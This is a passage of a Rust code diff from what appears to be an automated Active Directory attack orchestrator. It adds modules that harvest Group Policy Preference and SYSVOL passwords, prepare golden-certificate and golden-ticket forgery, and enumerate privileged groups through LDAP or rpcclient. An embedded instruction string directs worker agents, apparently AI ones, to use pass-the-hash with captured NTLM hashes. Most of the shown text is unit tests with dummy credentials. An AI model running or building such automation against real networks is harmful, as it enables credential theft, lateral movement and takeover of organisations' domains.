collect_dominated_domain_skipped() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state.dominated_domains.insert("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert!( + work.is_empty(), + "should not forge against an already-dominated domain" + ); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_GOLDEN_CERT, "192.168.58.50:contoso.local".into()); + let work = collect_golden_cert_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credential_skipped() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + // No credentials at all + let work = collect_golden_cert_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_resolves_dc_ip_when_available() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + 
.hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip.as_deref(), Some("192.168.58.10")); + } + + #[test] + fn collect_certenroll_case_insensitive() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "certenroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_picks_domain_sid_when_known() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .domain_sids + .insert("contoso.local".into(), "S-1-5-21-1111-2222-3333".into()); + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + assert_eq!( + work[0].domain_sid.as_deref(), + Some("S-1-5-21-1111-2222-3333") + ); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "CA01.CONTOSO.LOCAL", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + // Dedup key uses lowercase IP (already lowercase here) and lowercase domain + assert_eq!(work[0].dedup_key, "192.168.58.50:contoso.local"); + } + + #[test] + fn collect_multiple_owned_cas_yields_multiple_work() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state.shares.push(make_share("192.168.58.51", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state + .hosts + .push(make_host("192.168.58.51", "ca02.fabrikam.local", true)); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fabadmin", "Fab!Pass", "fabrikam.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 2); + } +} diff --git a/ares-cli/src/orchestrator/automation/golden_ticket.rs b/ares-cli/src/orchestrator/automation/golden_ticket.rs index d58b7372..3127cb0c 100644 --- a/ares-cli/src/orchestrator/automation/golden_ticket.rs +++ b/ares-cli/src/orchestrator/automation/golden_ticket.rs @@ -229,7 +229,7 @@ pub async fn auto_golden_ticket(dispatcher: Arc<Dispatcher>, mut shutdown: watch /// Uses the credential's own domain for NTLM auth (not the target domain) so ///
cross-domain trust authentication works — e.g. a `child.contoso.local` /// cred can resolve the SID of `contoso.local` via its parent DC. -async fn resolve_domain_sid( +pub(crate) async fn resolve_domain_sid( _domain: &str, dc_ip: &str, password_cred: Option<&ares_core::models::Credential>, diff --git a/ares-cli/src/orchestrator/automation/gpp_sysvol.rs b/ares-cli/src/orchestrator/automation/gpp_sysvol.rs new file mode 100644 index 00000000..a2d6d049 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/gpp_sysvol.rs @@ -0,0 +1,342 @@ +//! auto_gpp_sysvol -- search for GPP passwords and credential artifacts in SYSVOL. +//! +//! Group Policy Preferences (GPP) XML files can contain encrypted passwords +//! using a publicly known AES key (MS14-025). SYSVOL scripts (.bat, .ps1, .vbs) +//! often contain hardcoded credentials. +//! +//! Dispatches two techniques per DC: +//! 1. `gpp_password_finder` — searches SYSVOL for Groups.xml, Scheduledtasks.xml, etc. +//! 2. `sysvol_script_search` — greps SYSVOL scripts for passwords/credentials + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect GPP/SYSVOL work items from state (pure logic, no async). +fn collect_gpp_sysvol_work(state: &StateInner) -> Vec<GppSysvolWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("gpp:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_GPP_SYSVOL, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(GppSysvolWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Searches SYSVOL for GPP passwords and script credentials. +/// Interval: 45s. +pub async fn auto_gpp_sysvol(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("gpp_sysvol") { + continue; + } + + let work: Vec<GppSysvolWork> = { + let state = dispatcher.state.read().await; + collect_gpp_sysvol_work(&state) + }; + + for item in work { + let payload = json!({ + "techniques": ["gpp_password_finder", "sysvol_script_search"], + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("gpp_sysvol"); + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "GPP/SYSVOL credential search dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_GPP_SYSVOL, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_GPP_SYSVOL, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "GPP/SYSVOL task deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch GPP/SYSVOL search"); + } + } + } + } +} + +struct GppSysvolWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("gpp:{}", "contoso.local"); + assert_eq!(key, "gpp:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_GPP_SYSVOL, "gpp_sysvol"); + } + + #[test] + fn payload_contains_both_techniques() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "techniques": ["gpp_password_finder", "sysvol_script_search"], + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + let techniques = payload["techniques"].as_array().unwrap(); + assert_eq!(techniques.len(), 2); + assert_eq!(techniques[0], "gpp_password_finder"); + assert_eq!(techniques[1], "sysvol_script_search"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = GppSysvolWork { + dedup_key: "gpp:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dedup_key, "gpp:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("gpp:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "gpp:contoso.local"); + } + + #[test] + fn two_tasks_per_domain() { + // The payload dispatches two techniques in a single submission per domain + let techniques = ["gpp_password_finder", "sysvol_script_search"];
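+ // One submission carries both techniques, so each domain consumes a
+ // single queue slot rather than two.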
assert_eq!(techniques.len(), 2); + } + + // --- collect_gpp_sysvol_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_gpp_sysvol_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_gpp_sysvol_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dc_with_matching_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "gpp:contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_GPP_SYSVOL, "gpp:contoso.local".into()); + let work = collect_gpp_sysvol_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + } + + #[test] + fn collect_multiple_domains_produces_multiple_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state + .credentials + .push(make_cred("fabadmin", "fabrikam.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + state + .credentials + .push(make_cred("conuser", "contoso.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "conuser"); + } + + #[test] + fn collect_case_insensitive_domain_match() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + 
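+ // DC key stored uppercase on purpose: the matcher and the dedup key
+ // asserted below must still normalize to lowercase.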
state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "gpp:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("gpp:{}", "contoso.local"); + let key2 = format!("gpp:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } +} diff --git a/ares-cli/src/orchestrator/automation/group_enumeration.rs b/ares-cli/src/orchestrator/automation/group_enumeration.rs new file mode 100644 index 00000000..43723890 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/group_enumeration.rs @@ -0,0 +1,615 @@ +//! auto_group_enumeration -- enumerate domain groups and memberships via LDAP. +//! +//! Dispatches per-domain LDAP group enumeration to discover security groups, +//! their members, and cross-domain memberships. This covers a large gap in +//! attack surface mapping — group membership determines ACL attack paths, +//! privilege escalation chains, and cross-domain lateral movement. +//! +//! The recon agent queries `(objectCategory=group)` and resolves membership +//! recursively, including Foreign Security Principals for cross-domain groups. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect group enumeration work items from current state. +/// +/// Pure logic extracted from `auto_group_enumeration` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_group_enum_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() && state.hashes.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + let all_dcs = state.all_domains_with_dcs(); + if all_dcs.is_empty() { + return Vec::new(); + } + debug!( + domains = ?all_dcs.iter().map(|(d,_)| d.as_str()).collect::>(), + trusted = ?state.trusted_domains.keys().collect::>(), + creds = state.credentials.len(), + hashes = state.hashes.len(), + "Group enum state check" + ); + for (domain, dc_ip) in &all_dcs { + // Use separate dedup keys for cred vs hash attempts so a failed + // password-based attempt (e.g., mislabeled credential domain) + // doesn't permanently block the hash-based path. + let dedup_key_cred = format!("group_enum:{}:cred", domain.to_lowercase()); + let dedup_key_hash = format!("group_enum:{}:hash", domain.to_lowercase()); + let dedup_key_trust = format!("group_enum:{}:trust", domain.to_lowercase()); + + // Prefer same-domain cleartext cred, then fall back to trust-compatible + // cred (child→parent or cross-forest). Trust-based attempts use a + // separate dedup key so they don't block hash-based fallback. 
+ let (cred, using_trust_cred) = + if !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_cred) { + let c = state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .cloned(); + (c, false) + } else { + (None, false) + }; + let (cred, using_trust_cred) = + if cred.is_none() && !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_trust) { + match state.find_trust_credential(domain) { + Some(c) => (Some(c), true), + None => (None, using_trust_cred), + } + } else { + (cred, using_trust_cred) + }; + + // Look for NTLM hash (PTH) — fires independently of cred attempt + let (ntlm_hash, ntlm_hash_username) = + if cred.is_none() && !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_hash) { + state + .hashes + .iter() + .find(|h| { + h.hash_type.to_lowercase() == "ntlm" + && h.domain.to_lowercase() == domain.to_lowercase() + && h.username.to_lowercase() == "administrator" + }) + .or_else(|| { + state.hashes.iter().find(|h| { + h.hash_type.to_lowercase() == "ntlm" + && h.domain.to_lowercase() == domain.to_lowercase() + && !state.is_delegation_account(&h.username) + }) + }) + .map(|h| (Some(h.hash_value.clone()), Some(h.username.clone()))) + .unwrap_or((None, None)) + } else { + (None, None) + }; + + // Need at least a credential or an NTLM hash + if cred.is_none() && ntlm_hash.is_none() { + debug!( + domain = %domain, + cred_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_cred), + trust_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_trust), + hash_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_hash), + "Group enum: no credential/hash found for domain" + ); + continue; + } + + let dedup_key = if ntlm_hash.is_some() { + dedup_key_hash + } else if using_trust_cred { + dedup_key_trust + } else { + dedup_key_cred + }; + + items.push(GroupEnumWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred.unwrap_or_else(|| ares_core::models::Credential { + id: String::new(), + username: ntlm_hash_username.clone().unwrap_or_default(), + password: String::new(), + domain: domain.clone(), + source: "hash_fallback".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }), + ntlm_hash, + ntlm_hash_username, + }); + } + + items +} + +/// Dispatches group enumeration per domain. +/// Interval: 20s. +pub async fn auto_group_enumeration( + dispatcher: Arc<Dispatcher>, + mut shutdown: watch::Receiver<bool>, +) { + let mut interval = tokio::time::interval(Duration::from_secs(20)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("group_enumeration") { + continue; + } + + let work: Vec<GroupEnumWork> = { + let state = dispatcher.state.read().await; + collect_group_enum_work(&state) + }; + + if !work.is_empty() { + info!( + count = work.len(), + domains = ?work.iter().map(|w| w.domain.as_str()).collect::<Vec<_>>(), + "Group enumeration work items collected" + ); + } + for item in work { + // When PTH hash is available, use the hash user's identity for the target domain + // instead of a cross-domain credential that will fail LDAP simple bind.
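+ // Assumed shape of the PTH branch below: username from the hash, empty
+ // password (signals pass-the-hash to the worker), and the *target*
+ // domain so the bind identity matches the DC being queried.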
+ let (cred_user, cred_pass, cred_domain) = if item.ntlm_hash.is_some() { + ( + item.ntlm_hash_username + .clone() + .unwrap_or_else(|| item.credential.username.clone()), + String::new(), // empty password forces PTH path + item.domain.clone(), // target domain, not cross-domain + ) + } else { + ( + item.credential.username.clone(), + item.credential.password.clone(), + item.credential.domain.clone(), + ) + }; + let cross_domain = cred_domain.to_lowercase() != item.domain.to_lowercase(); + let mut payload = json!({ + "technique": "ldap_group_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": cred_user, + "password": cred_pass, + "domain": cred_domain, + }, + "filters": ["(objectCategory=group)"], + "attributes": [ + "sAMAccountName", "member", "memberOf", "managedBy", + "groupType", "objectSid", "description", "cn" + ], + "enumerate_members": true, + "resolve_foreign_principals": true, + "instructions": concat!( + "Enumerate ALL security groups in this domain.\n\n", + "AUTHENTICATION: If the password field is EMPTY and an NTLM hash is provided, ", + "you MUST use pass-the-hash. Do NOT attempt LDAP simple bind with empty password.\n", + " Use rpcclient_command with the hash parameter: rpcclient_command(target=dc_ip, ", + "username=user, domain=domain, hash=<ntlm-hash>, command='enumdomgroups') — ", + "then for each group RID: 'querygroupmem <rid>' and 'queryuser <rid>' to resolve members.\n", + " IMPORTANT: Pass the hash via the 'hash' parameter, NOT as the password.\n\n", + "If a password IS provided, use ldap_search with filter (objectCategory=group) ", + "to enumerate groups, members, and Foreign Security Principals.\n\n", + "CROSS-DOMAIN AUTH: If the credential domain differs from the target domain ", + "(e.g. credential from child.domain.local querying parent domain.local), ", + "you MUST pass bind_domain=<credential-domain> to ldap_search.
", + "Check the 'bind_domain' field in the task payload — if present, always pass it ", + "to ldap_search so the LDAP bind uses user@bind_domain while querying the target domain.\n\n", + "For EACH group found, report it as a vulnerability:\n", + " vuln_type: 'group_enumerated'\n", + " target: the group sAMAccountName\n", + " target_ip: the DC IP\n", + " domain: the domain\n", + " details: {\"group_type\": \"Global/DomainLocal/Universal\", ", + "\"members\": [\"user1\", \"user2\"], \"managed_by\": \"manager\", ", + "\"admin_count\": true/false}\n\n", + "Pay special attention to: Domain Admins, Enterprise Admins, Administrators, ", + "Backup Operators, Server Operators, Account Operators, DnsAdmins, ", + "and any custom groups with adminCount=1.\n\n", + "Report cross-domain memberships as vuln_type='foreign_group_membership'.\n\n", + "IMPORTANT: For each user found, include in discovered_users array:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"ldap_group_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}" + ), + }); + if cross_domain { + payload["bind_domain"] = json!(item.credential.domain); + } + // Attach NTLM hash for PTH when no cleartext cred for target domain + if let Some(ref hash) = item.ntlm_hash { + payload["ntlm_hash"] = json!(hash); + } + if let Some(ref user) = item.ntlm_hash_username { + payload["hash_username"] = json!(user); + } + + let priority = dispatcher.effective_priority("group_enumeration"); + match dispatcher + .force_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "Group enumeration dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_GROUP_ENUMERATION, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_GROUP_ENUMERATION, &item.dedup_key) + .await; + } + Ok(None) => { + info!(domain = %item.domain, dc = %item.dc_ip, "Group enumeration deferred by throttler"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch group enumeration"); + } + } + } + } +} + +struct GroupEnumWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, + ntlm_hash: Option, + ntlm_hash_username: Option, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key_cred = format!("group_enum:{}:cred", "contoso.local"); + let key_hash = format!("group_enum:{}:hash", "contoso.local"); + assert_eq!(key_cred, "group_enum:contoso.local:cred"); + assert_eq!(key_hash, "group_enum:contoso.local:hash"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_GROUP_ENUMERATION, "group_enumeration"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ldap_group_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + "filters": ["(objectCategory=group)"], + "attributes": [ + "sAMAccountName", "member", "memberOf", "managedBy", + "groupType", "objectSid", "description", "cn" + ], + 
"enumerate_members": true, + "resolve_foreign_principals": true, + }); + assert_eq!(payload["technique"], "ldap_group_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert!(payload["enumerate_members"].as_bool().unwrap()); + assert!(payload["resolve_foreign_principals"].as_bool().unwrap()); + } + + #[test] + fn ldap_attributes_list() { + let attrs = [ + "sAMAccountName", + "member", + "memberOf", + "managedBy", + "groupType", + "objectSid", + "description", + "cn", + ]; + assert_eq!(attrs.len(), 8); + assert!(attrs.contains(&"sAMAccountName")); + assert!(attrs.contains(&"objectSid")); + assert!(attrs.contains(&"managedBy")); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = GroupEnumWork { + dedup_key: "group_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + ntlm_hash: None, + ntlm_hash_username: None, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("group_enum:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "group_enum:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("group_enum:{}:cred", "contoso.local"); + let key2 = format!("group_enum:{}:cred", "fabrikam.local"); + assert_ne!(key1, key2); + } + + #[test] + fn collect_hash_fires_after_cred_dedup_burned() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Cred-based attempt already dispatched (may have failed) + state.mark_processed( + DEDUP_GROUP_ENUMERATION, + "group_enum:contoso.local:cred".into(), + ); + // Add an NTLM hash — should still generate work via hash path + state.hashes.push(ares_core::models::Hash { + id: "h1".into(), + username: "Administrator".into(), + hash_value: "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0".into(), + hash_type: "ntlm".into(), + domain: "contoso.local".into(), + source: "secretsdump".into(), + cracked_password: None, + discovered_at: None, + parent_id: None, + aes_key: None, + attack_step: 0, + }); + let work = collect_group_enum_work(&state); + assert_eq!( + work.len(), + 1, + "hash path should fire even after cred dedup burned" + ); + assert_eq!(work[0].dedup_key, "group_enum:contoso.local:hash"); + assert!(work[0].ntlm_hash.is_some()); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_group_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), 
"192.168.58.10".into()); + let work = collect_group_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_with_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed( + DEDUP_GROUP_ENUMERATION, + "group_enum:contoso.local:cred".into(), + ); + state.mark_processed( + DEDUP_GROUP_ENUMERATION, + "group_enum:contoso.local:hash".into(), + ); + let work = collect_group_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_cross_domain_cred_skipped_without_hash() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam cred — should NOT fall back cross-domain (burns dedup slot) + state + .credentials + .push(make_credential("crossuser", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 0, "cross-domain cred should not produce work"); + } + + #[test] + fn collect_multiple_domains() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fadmin", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "group_enum:contoso.local:cred"); + } + + #[test] + fn collect_prefers_same_domain_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("localadmin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "localadmin"); + } + + #[test] + fn collect_child_cred_falls_back_for_parent_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + 
